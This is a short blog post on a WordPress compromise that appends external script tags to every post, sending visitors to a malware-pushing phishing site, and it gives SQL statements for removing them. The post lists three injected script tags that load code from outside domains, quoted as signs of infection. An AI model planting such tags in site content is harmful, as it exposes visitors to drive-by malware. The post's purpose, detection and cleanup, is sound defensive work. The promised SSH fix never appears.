WordPress Redirect Exploit

Recently a large number of web sites were compromised in a subtle redirection attack. By some unknown means the attacker gains access to your wordpress database and inserts some javascript into the end of all your posts. This code will load from an external site, and on the first load, set a cookie, then redirect to a “virus” phishing site which attempts to install malicious software on the user’s computer. Subsequent visits to the site are transparent due to the cookie although the script is still run. If you search through the source code you may find a variation of the following code:

  • <script src="http://ae.awaue.com/7"></script>
  • <script src="ie.eracou.com/3"></script>
  • <script src="ao.euuaw.com/9"></script>

This exploit has been noted by Mediatemple, who seems to have been targeted, although they claim their servers are secure, it is currently unknown as to the cause.

This script will have been inserted into every post and can be cleaned by hand, but you would have to open each post in HTML mode and remove the code from the end. A cleaner approach is to use phpmyadmin (or other method) to run the following SQL code (or a variation to account for different URLs)

  • update wp_posts set post_content = replace(post_content,'<script src="http://ae.awaue.com/7"></script>','');
  • update wp_posts set post_content = replace(post_content,'<script src="ie.eracou.com/3"></script>','');
  • update wp_posts set post_content = replace(post_content,'<script src="http://ao.euuaw.com/9"></script>','');

Mediatemple has also provided a fix via SSH as follows:

If you would like assistance in resolving this issue send me a message using the contact form. I am available for limited consulting free of charge or can resolve this issue for a small fee.

For more information you can read the following articles:

http://digwp.com/2010/07/media-temple-wordpress-hack/

http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit